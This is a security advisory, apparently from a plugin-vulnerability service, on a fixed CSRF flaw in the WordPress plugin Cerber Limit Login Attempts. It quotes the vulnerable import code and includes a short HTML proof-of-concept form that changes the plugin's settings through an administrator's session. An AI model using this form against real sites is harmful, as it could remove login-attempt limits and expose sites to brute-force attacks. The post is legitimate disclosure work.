Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Cerber Limit Login Attempts

We recently have been doing some basic security checks on WordPress plugins that log login and user activity attempts, through that we came across plugin Cerber Limit Login Attempts. (In addition to logging login attempts that plugin prominently promotes itself as as protecting against brute force attacks, despite the fact those are not happening.)

In looking over the plugin we found that the plugin has a tool that allows changing the plugin’s settings and as of version 2.7.2 it did not include protection against cross-site request forgery (CSRF). So if you could get a logged in administrator to access a page you control you could cause the settings to be be changed and remove the limits it puts on login attempts.

In version 2.7.2 the code that handles the import starts with the following code:

add_action('admin_init','cerber_import');
function cerber_import(){
	global $wpdb;
	if ($_SERVER['REQUEST_METHOD']!='POST' || !isset($_POST['cerber_import'])) return;
	if (!current_user_can('manage_options')) wp_die('Upload failed.');
	$ok = true;
	if (!is_uploaded_file($_FILES['ifile']['tmp_name'])) {
		update_site_option('cerber_admin_notice',__('No file was uploaded or file is corrupted','cerber'));
		return;
	}
	elseif ($file = file_get_contents($_FILES['ifile']['tmp_name'])) {

The code in the function does check to make sure only Administrator lever user are able to do an import by checking if the user can “manage_options”, but no nonce check is done leading to the CSRF issue.

A week ago we contacted the developer they responded it will be fixed soon and today version 2.9 was released, which fixes the vulnerability by adding a nonce to the import form and then checks when a request for an import is sent.

Proof of Concept

The following proof of concept will cause the plugin’s setting to be changed to what is specified in the uploading file, when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress. The plugins export tool can be used to generate a settings files to be imported.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=cerber-settings&tab=tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="importset" value="1" />
<input type="hidden" name="importacl" value="1" />
<input type="file" name="ifile" />
<input type="submit" name="cerber_import" value="Submit" />
</form>
</body>
</html>

Timeline

8/22/2016 – Developer notified.
8/29/2016 – Version 2.9 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Plugin Vulnerabilities

A service to protect your site against vulnerabilities in WordPress plugins.

Leave a Reply Cancel reply